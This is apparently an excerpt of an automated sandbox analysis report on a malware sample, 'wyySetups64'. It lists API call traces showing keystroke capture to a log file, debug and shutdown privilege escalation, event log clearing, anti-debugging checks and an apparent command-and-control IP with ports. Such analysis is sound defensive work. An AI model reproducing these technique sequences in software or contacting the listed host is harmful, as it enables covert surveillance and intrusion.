                                                                                                                                                                                                              • Instruction Fuzzy Hash: 844163B5A40358ABDB31EB61DCC5FEE77BCAB44700F0042D9F609E6280DAB59A85CF54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,033A0D80,74DEE010,74DF2FA0,74DF0F00,?,03376028,?,?), ref: 0337E519
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A0D80,\DisplaySessionContainers.log,?,03376028,?,?), ref: 0337E529
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,033A0D80,?,03376028,?,?), ref: 0337E538
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03376028,?,?), ref: 0337E546
                                                                                                                                                                                                              • CreateFileW.KERNEL32(033A0D80,40000000,00000002,00000000,00000004,00000080,00000000,?,03376028,?,?), ref: 0337E563
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,03376028,?,?), ref: 0337E56E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,03376028,?,?), ref: 0337E577
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(033A0D80,?,03376028,?,?), ref: 0337E58A
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,03376028,?,?), ref: 0337E597
                                                                                                                                                                                                              • DirectInput8Create.DINPUT8(?,00000800,03394934,033A1220,00000000,?,03376028,?,?), ref: 0337E5B2
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337E665
                                                                                                                                                                                                              • GetKeyState.USER32(00000014), ref: 0337E672
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                                                                                                                              • String ID: <$\DisplaySessionContainers.log
                                                                                                                                                                                                              • API String ID: 1095970075-1170057892
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,0337DFA4), ref: 03377637
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0337DFA4), ref: 0337763E
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0337765A
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377677
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377681
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,0337DFA4), ref: 03377691
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 03377698
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 033776BA
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 033776C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                                                                                                                              • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                                                                                                                              • API String ID: 1802016953-1577477132
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03380576
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0338058E
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0338059E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 033805AE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 03380600
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 03380615
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                                                                                                                              • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3290314748-423161677
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                              • API String ID: 3435690185-3733053543
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenEventLogW.ADVAPI32(00000000,033958BC), ref: 0337B3E7
                                                                                                                                                                                                              • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 0337B3F2
                                                                                                                                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 0337B3F9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Event$ClearCloseOpen
                                                                                                                                                                                                              • String ID: Application$Security$System
                                                                                                                                                                                                              • API String ID: 1391105993-2169399579
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: swprintf$_memset
                                                                                                                                                                                                              • String ID: :$@
                                                                                                                                                                                                              • API String ID: 1292703666-1367939426
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,033778FC), ref: 03377756
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,033778FC,?,?,?,?,?,?,74DF0630), ref: 0337775D
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03377785
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 033777B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                                                              • API String ID: 2349140579-2896544425
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BD793D
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD7952
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00BE5350), ref: 00BD795D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00BD7979
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00BD7980
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0338131C
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03381331
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(033925B8), ref: 0338133C
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 03381358
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0338135F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                                • Part of subcall function 03377B70: OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                                • Part of subcall function 03377B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                                • Part of subcall function 03377B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 0337B44D
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 681424410-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                                • Part of subcall function 03377B70: OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                                • Part of subcall function 03377B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                                • Part of subcall function 03377B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000004,00000000), ref: 0337B429
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 681424410-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                                • Part of subcall function 03377B70: OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                                • Part of subcall function 03377B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                                • Part of subcall function 03377B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000005,00000000), ref: 0337B471
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 681424410-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0337B586
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0337B596
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0337B5B3
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B5D4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337B61B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B63C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337B72C
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0337B737
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F756
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F770
                                                                                                                                                                                                                • Part of subcall function 0337F707: __CxxThrowException@8.LIBCMT ref: 0337F781
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                                                                                                              • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                                                                                                              • API String ID: 1186799303-3661167401
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9ACE
                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 00BD9ADA
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: DecodePointer.KERNEL32(00000008,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD97B6
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: TlsFree.KERNEL32(00000025,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD97D0
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BDC031
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: _free.LIBCMT ref: 00BDC034
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: DeleteCriticalSection.KERNEL32(00000025,?,?,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BDC05B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BD9AF0
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BD9AFD
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BD9B0A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BD9B17
                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9B67
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9B82
                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 00BD9B8C
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9B9D
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BAA
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BB7
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BC4
                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_00009929,?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BE5
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00BD9BFA
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9C14
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD9C26
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 0338401C
                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 03384028
                                                                                                                                                                                                                • Part of subcall function 03383CF1: DecodePointer.KERNEL32(00000009,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03383D02
                                                                                                                                                                                                                • Part of subcall function 03383CF1: TlsFree.KERNEL32(00000027,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03383D1C
                                                                                                                                                                                                                • Part of subcall function 03383CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03388D48
                                                                                                                                                                                                                • Part of subcall function 03383CF1: _free.LIBCMT ref: 03388D4B
                                                                                                                                                                                                                • Part of subcall function 03383CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03388D72
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0338403E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0338404B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03384058
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03384065
                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840B5
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840D0
                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 033840DA
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840EB
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840F8
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384105
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384112
                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_00013E75,?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384133
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 03384148
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384162
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 03384174
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                                                                                                              • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
